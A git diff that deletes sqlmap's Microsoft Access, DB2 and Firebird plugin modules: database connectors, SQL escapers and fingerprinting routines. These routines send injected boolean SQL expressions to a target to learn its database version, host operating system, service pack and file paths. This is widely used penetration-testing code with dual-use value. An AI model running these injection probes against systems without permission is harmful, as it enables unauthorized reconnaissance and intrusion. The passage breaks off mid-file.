return self._len() - - def _len(self): - return max(0, int((self.stop - self.start) / self.step)) - - def __contains__(self, value): - return (self.start <= value < self.stop) and (value - self.start) % self.step == 0 - - def __getitem__(self, index): - if isinstance(index, slice): - start, stop, step = index.indices(self._len()) - return xrange(self._index(start), - self._index(stop), step*self.step) - elif isinstance(index, (int, long)): - if index < 0: - fixed_index = index + self._len() - else: - fixed_index = index - - if not 0 <= fixed_index < self._len(): - raise IndexError("Index %d out of %r" % (index, self)) - - return self._index(fixed_index) - else: - raise TypeError("xrange indices must be slices or integers") - - def _index(self, i): - return self.start + self.step * i diff --git a/plugins/__init__.py b/plugins/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/plugins/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/plugins/dbms/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py deleted file mode 100644 index 4e8da68f..00000000 --- a/plugins/dbms/access/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import ACCESS_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.access.enumeration import Enumeration -from 
plugins.dbms.access.filesystem import Filesystem -from plugins.dbms.access.fingerprint import Fingerprint -from plugins.dbms.access.syntax import Syntax -from plugins.dbms.access.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class AccessMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Microsoft Access methods - """ - - def __init__(self): - self.excludeDbsList = ACCESS_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.ACCESS] = Syntax.escape diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py deleted file mode 100644 index ce4e4016..00000000 --- a/plugins/dbms/access/connector.py +++ /dev/null @@ -1,70 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import pyodbc -except ImportError: - pass - -import logging - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.settings import IS_WIN -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://pyodbc.googlecode.com/ - User guide: http://code.google.com/p/pyodbc/wiki/GettingStarted - API: http://code.google.com/p/pyodbc/w/list - Debian package: python-pyodbc - License: MIT - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - if not IS_WIN: - errMsg = "currently, direct connection to Microsoft Access database(s) " - errMsg += "is restricted to Windows platforms" - raise SqlmapUnsupportedFeatureException(errMsg) - - self.initConnection() - self.checkFileDb() - - try: - self.connector = 
pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db) - except (pyodbc.Error, pyodbc.OperationalError), msg: - raise SqlmapConnectionException(msg[1]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except pyodbc.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - try: - self.cursor.execute(query) - except (pyodbc.OperationalError, pyodbc.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except pyodbc.Error, msg: - raise SqlmapConnectionException(msg[1]) - - self.connector.commit() - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py deleted file mode 100644 index 9c7f5411..00000000 --- a/plugins/dbms/access/enumeration.py +++ /dev/null @@ -1,81 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getBanner(self): - warnMsg = "on Microsoft Access it is not possible to get a banner" - logger.warn(warnMsg) - - return None - - def getCurrentUser(self): - warnMsg = "on Microsoft Access it is not possible to enumerate the current user" - logger.warn(warnMsg) - - def getCurrentDb(self): - warnMsg = "on Microsoft Access it is not possible to get name of the current database" - logger.warn(warnMsg) - - def isDba(self): - warnMsg = "on Microsoft Access it is not possible to test if current user is DBA" - logger.warn(warnMsg) - - def getUsers(self): - warnMsg = "on Microsoft Access 
it is not possible to enumerate the users" - logger.warn(warnMsg) - - return [] - - def getPasswordHashes(self): - warnMsg = "on Microsoft Access it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) - - return {} - - def getPrivileges(self, *args): - warnMsg = "on Microsoft Access it is not possible to enumerate the user privileges" - logger.warn(warnMsg) - - return {} - - def getDbs(self): - warnMsg = "on Microsoft Access it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) - - return [] - - def searchDb(self): - warnMsg = "on Microsoft Access it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def searchTable(self): - warnMsg = "on Microsoft Access it is not possible to search tables" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - warnMsg = "on Microsoft Access it is not possible to search columns" - logger.warn(warnMsg) - - return [] - - def search(self): - warnMsg = "on Microsoft Access search option is not available" - logger.warn(warnMsg) - - def getHostname(self): - warnMsg = "on Microsoft Access it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py deleted file mode 100644 index 45f92b03..00000000 --- a/plugins/dbms/access/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on Microsoft Access it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, 
forceCheck=False): - errMsg = "on Microsoft Access it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py deleted file mode 100644 index 9ac4fd59..00000000 --- a/plugins/dbms/access/fingerprint.py +++ /dev/null @@ -1,191 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import getCurrentThreadData -from lib.core.common import randomStr -from lib.core.common import wasLastResponseDBMSError -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import ACCESS_ALIASES -from lib.core.settings import METADB_SUFFIX -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.ACCESS) - - def _sandBoxCheck(self): - # Reference: http://milw0rm.com/papers/198 - retVal = None - table = None - - if Backend.isVersionWithin(("97", "2000")): - table = "MSysAccessObjects" - elif Backend.isVersionWithin(("2002-2003", "2007")): - table = "MSysAccessStorage" - - if table is not None: - result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table) - retVal = "not sandboxed" if result else "sandboxed" - - return retVal - - def _sysTablesCheck(self): - infoMsg = "executing system table(s) existence fingerprint" - logger.info(infoMsg) - - # Microsoft Access table reference updated on 01/2010 - sysTables = { - "97": ("MSysModules2", "MSysAccessObjects"), - "2000" : ("!MSysModules2", "MSysAccessObjects"), - "2002-2003" : ("MSysAccessStorage", 
"!MSysNavPaneObjectIDs"), - "2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"), - } - # MSysAccessXML is not a reliable system table because it doesn't always exist - # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty") - - for version, tables in sysTables.items(): - exist = True - - for table in tables: - negate = False - - if table[0] == '!': - negate = True - table = table[1:] - - result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE [RANDNUM]=[RANDNUM])" % table) - if result is None: - result = False - - if negate: - result = not result - - exist &= result - - if not exist: - break - - if exist: - return version - - return None - - def _getDatabaseDir(self): - retVal = None - - infoMsg = "searching for database directory" - logger.info(infoMsg) - - randStr = randomStr() - inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr)) - - if wasLastResponseDBMSError(): - threadData = getCurrentThreadData() - match = re.search("Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1]) - - if match: - retVal = match.group(1).rstrip("%s.mdb" % randStr) - - if retVal.endswith('\\'): - retVal = retVal[:-1] - - return retVal - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.ACCESS - return value - - actVer = Format.getDbms() + " (%s)" % (self._sandBoxCheck()) - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp 
= Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - value += "\ndatabase directory: '%s'" % self._getDatabaseDir() - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or (conf.dbms or "").lower() in ACCESS_ALIASES): - setDbms(DBMS.ACCESS) - - return True - - infoMsg = "testing %s" % DBMS.ACCESS - logger.info(infoMsg) - - result = inject.checkBooleanExpression("VAL(CVAR(1))=1") - - if result: - infoMsg = "confirming %s" % DBMS.ACCESS - logger.info(infoMsg) - - result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS - logger.warn(warnMsg) - return False - - setDbms(DBMS.ACCESS) - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.ACCESS - logger.info(infoMsg) - - version = self._sysTablesCheck() - - if version is not None: - Backend.setVersion(version) - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.ACCESS - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - conf.db = ("%s%s" % (DBMS.ACCESS, METADB_SUFFIX)).replace(' ', '_') diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py deleted file mode 100644 index 54433982..00000000 --- a/plugins/dbms/access/syntax.py +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - def escaper(value): - return "&".join("CHR(%d)" % ord(_) for _ in value) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/access/takeover.py 
b/plugins/dbms/access/takeover.py deleted file mode 100644 index cf36259a..00000000 --- a/plugins/dbms/access/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on Microsoft Access it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on Microsoft Access it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on Microsoft Access it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on Microsoft Access it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py deleted file mode 100644 index 59fdfd36..00000000 --- a/plugins/dbms/db2/__init__.py +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import DB2_SYSTEM_DBS -from lib.core.unescaper import unescaper - -from plugins.dbms.db2.enumeration import Enumeration -from plugins.dbms.db2.filesystem import Filesystem -from plugins.dbms.db2.fingerprint import Fingerprint -from plugins.dbms.db2.syntax import Syntax -from plugins.dbms.db2.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class DB2Map(Syntax, Fingerprint, Enumeration, Filesystem, 
Miscellaneous, Takeover): - """ - This class defines DB2 methods - """ - - def __init__(self): - self.excludeDbsList = DB2_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.DB2] = Syntax.escape diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py deleted file mode 100644 index 5c08561b..00000000 --- a/plugins/dbms/db2/connector.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import ibm_db_dbi -except ImportError: - pass - -import logging - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://code.google.com/p/ibm-db/ - User guide: http://code.google.com/p/ibm-db/wiki/README - API: http://www.python.org/dev/peps/pep-0249/ - License: Apache License 2.0 - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - database = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) - self.connector = ibm_db_dbi.connect(database, self.user, self.password) - except ibm_db_dbi.OperationalError, msg: - raise SqlmapConnectionException(msg) - - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except ibm_db_dbi.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - try: - self.cursor.execute(query) - except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: - 
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except ibm_db_dbi.InternalError, msg: - raise SqlmapConnectionException(msg[1]) - - self.connector.commit() - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py deleted file mode 100644 index 19ba22bc..00000000 --- a/plugins/dbms/db2/enumeration.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - - -from lib.core.data import logger -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getPasswordHashes(self): - warnMsg = "on DB2 it is not possible to list password hashes" - logger.warn(warnMsg) - - return {} - diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py deleted file mode 100644 index 9cfc1862..00000000 --- a/plugins/dbms/db2/filesystem.py +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py deleted file mode 100644 index 15a8b8c4..00000000 --- a/plugins/dbms/db2/fingerprint.py +++ /dev/null @@ -1,167 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data 
import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import DB2_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.DB2) - - def _versionCheck(self): - minor, major = None, None - - for version in reversed(xrange(5, 15)): - result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM sysibm.sysversions WHERE versionnumber BETWEEN %d000000 AND %d999999)>0" % (version, version)) - - if result: - major = version - - for version in reversed(xrange(0, 20)): - result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM sysibm.sysversions WHERE versionnumber BETWEEN %d%02d0000 AND %d%02d9999)>0" % (major, version, major, version)) - if result: - minor = version - version = "%s.%s" % (major, minor) - break - - break - - if major and minor: - return "%s.%s" % (major, minor) - else: - return None - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.DB2 - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or (conf.dbms or "").lower() in 
DB2_ALIASES): - setDbms(DBMS.DB2) - - return True - - logMsg = "testing %s" % DBMS.DB2 - logger.info(logMsg) - - result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1)") - - if result: - logMsg = "confirming %s" % DBMS.DB2 - logger.info(logMsg) - - version = self._versionCheck() - - if version: - Backend.setVersion(version) - setDbms("%s %s" % (DBMS.DB2, Backend.getVersion())) - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.DB2 - logger.warn(warnMsg) - - return False - - def checkDbmsOs(self, detailed=False): - if Backend.getOs(): - return - - infoMsg = "fingerprinting the back-end DBMS operating system " - infoMsg += "version and service pack" - logger.info(infoMsg) - - query = "(SELECT LENGTH(OS_NAME) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_NAME LIKE '%WIN%')>0" - result = inject.checkBooleanExpression(query) - - if not result: - Backend.setOs(OS.LINUX) - else: - Backend.setOs(OS.WINDOWS) - - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - - if result: - versions = { "2003": ("5.2", (2, 1)), - "2008": ("7.0", (1,)), - "2000": ("5.0", (4, 3, 2, 1)), - "7": ("6.1", (1, 0)), - "XP": ("5.1", (2, 1)), - "NT": ("4.0", (6, 5, 4, 3, 2, 1)) } - - # Get back-end DBMS underlying operating system version - for version, data in versions.items(): - query = "(SELECT LENGTH(OS_VERSION) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_VERSION = '%s')>0" % data[0] - result = inject.checkBooleanExpression(query) - - if result: - Backend.setOsVersion(version) - infoMsg += " %s" % Backend.getOsVersion() - break - - if not Backend.getOsVersion(): - return - - # Get back-end DBMS underlying operating system service pack - for sp in versions[Backend.getOsVersion()][1]: - query = "(SELECT LENGTH(OS_RELEASE) FROM SYSIBMADM.ENV_SYS_INFO WHERE OS_RELEASE LIKE '%Service Pack " + str(sp) + "%')>0" - result = inject.checkBooleanExpression(query) - - if result: - Backend.setOsServicePack(sp) - break - - if not 
Backend.getOsServicePack(): - Backend.setOsServicePack(0) - debugMsg = "assuming the operating system has no service pack" - logger.debug(debugMsg) - - if Backend.getOsVersion(): - infoMsg += " Service Pack %d" % Backend.getOsServicePack() - - logger.info(infoMsg) diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py deleted file mode 100644 index ffd9141c..00000000 --- a/plugins/dbms/db2/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar' - """ - - def escaper(value): - return "||".join("CHR(%d)" % ord(_) for _ in value) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py deleted file mode 100644 index d1504b06..00000000 --- a/plugins/dbms/db2/takeover.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - self.__basedir = None - self.__datadir = None - - GenericTakeover.__init__(self) diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py deleted file mode 100644 index d0ec59a3..00000000 --- a/plugins/dbms/firebird/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" 
- -from lib.core.enums import DBMS -from lib.core.settings import FIREBIRD_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.firebird.enumeration import Enumeration -from plugins.dbms.firebird.filesystem import Filesystem -from plugins.dbms.firebird.fingerprint import Fingerprint -from plugins.dbms.firebird.syntax import Syntax -from plugins.dbms.firebird.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class FirebirdMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Firebird methods - """ - - def __init__(self): - self.excludeDbsList = FIREBIRD_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.FIREBIRD] = Syntax.escape diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py deleted file mode 100644 index ab7c5275..00000000 --- a/plugins/dbms/firebird/connector.py +++ /dev/null @@ -1,69 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import kinterbasdb -except ImportError: - pass - -import logging - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.settings import UNICODE_ENCODING -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://kinterbasdb.sourceforge.net/ - User guide: http://kinterbasdb.sourceforge.net/dist_docs/usage.html - Debian package: python-kinterbasdb - License: BSD - """ - - def __init__(self): - GenericConnector.__init__(self) - - # sample usage: - # ./sqlmap.py -d "firebird://sysdba:testpass@/opt/firebird/testdb.fdb" - # ./sqlmap.py -d 
"firebird://sysdba:testpass@127.0.0.1:3050//opt/firebird/testdb.fdb" - def connect(self): - self.initConnection() - - if not self.hostname: - self.checkFileDb() - - try: - self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \ - user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: http://www.daniweb.com/forums/thread248499.html - except kinterbasdb.OperationalError, msg: - raise SqlmapConnectionException(msg[1]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - try: - self.cursor.execute(query) - except kinterbasdb.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except kinterbasdb.Error, msg: - raise SqlmapConnectionException(msg[1]) - - self.connector.commit() - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py deleted file mode 100644 index 6e6e93be..00000000 --- a/plugins/dbms/firebird/enumeration.py +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getDbs(self): - warnMsg = "on Firebird it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) - - return [] - - def getPasswordHashes(self): - warnMsg = "on Firebird it is not possible to 
enumerate the user password hashes" - logger.warn(warnMsg) - - return {} - - def searchDb(self): - warnMsg = "on Firebird it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - warnMsg = "on Firebird it is not possible to search columns" - logger.warn(warnMsg) - - return [] - - def getHostname(self): - warnMsg = "on Firebird it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py deleted file mode 100644 index 7711fc53..00000000 --- a/plugins/dbms/firebird/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on Firebird it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on Firebird it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py deleted file mode 100644 index f32ff494..00000000 --- a/plugins/dbms/firebird/fingerprint.py +++ /dev/null @@ -1,162 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomRange -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from 
